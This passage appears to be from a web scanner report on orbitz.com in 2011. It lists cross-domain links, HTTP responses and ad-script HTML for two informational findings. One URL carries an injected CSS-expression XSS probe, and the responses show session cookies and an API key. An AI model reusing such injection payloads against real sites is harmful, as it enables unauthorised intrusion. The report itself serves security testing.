<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662782325&dsrc=7&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

17.342. http://www.orbitz.com/App/InitDealEdit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/InitDealEdit

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/InitDealEdit?fromDealsPage=true&z=2eca&r=t

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=160x600&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=600&width=160&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=1&width=1&adType=iframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=dealdetector&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=1&width=1&adType=iframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=160x600&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=600&width=160&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=1&width=1&adType=iframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&
http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=1&width=1&adType=iframe&
http://www.revresda.com/js.ng/channel=deals&Section=dealdetector&adsize=160x600&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=600&width=160&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=dealdetector&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=B14F9784369BDA42B899F65B9ECC9BCF; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:11:39 GMT
Content-Length: 41738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmln
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=dealdetector&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<div class="ad" id="ad160x600">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=dealdetector&adsize=160x600&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=600&width=160&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=160x600&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=600&width=160&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=160x600&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=600&width=160&adType=noframe&" height="600" width="160" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=deals&Section=dealdetector&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=1&width=1&adType=iframe&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=1&width=1&adType=iframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=1&width=1&adType=iframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=dealdetector&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663100153&dsrc=7&height=1&width=1&adType=iframe&" height="1" width="1" border="0"></a>
...[SNIP]...

17.343. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&
http://www.revresda.com/html.ng/Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=4D84CD377DBEA23C09465CAB80CFF42F; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: anon=15636604731296573771992; Domain=.orbitz.com; Expires=Mon, 27-Jan-2031 15:22:51 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,0,0,0"; Domain=.orbitz.com; Expires=Mon, 27-Jan-2031 15:22:51 GMT; Path=/
Set-Cookie: logging=4D84CD377DBEA23C09465CAB80CFF42F|egapp06p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Tue, 01 Feb 2011 15:22:51 GMT
Set-Cookie: NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a73545525d5f4f58455e445a4a4217b9;path=/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/
Content-Length: 186838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="adsponsorlogo">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=top&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=bottom&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=bottom&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&pos=bottom&" height="null" width="null" border="0"></a>
...[SNIP]...
</style>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA"></script>
...[SNIP]...
<div class="ad" id="ad336x280">
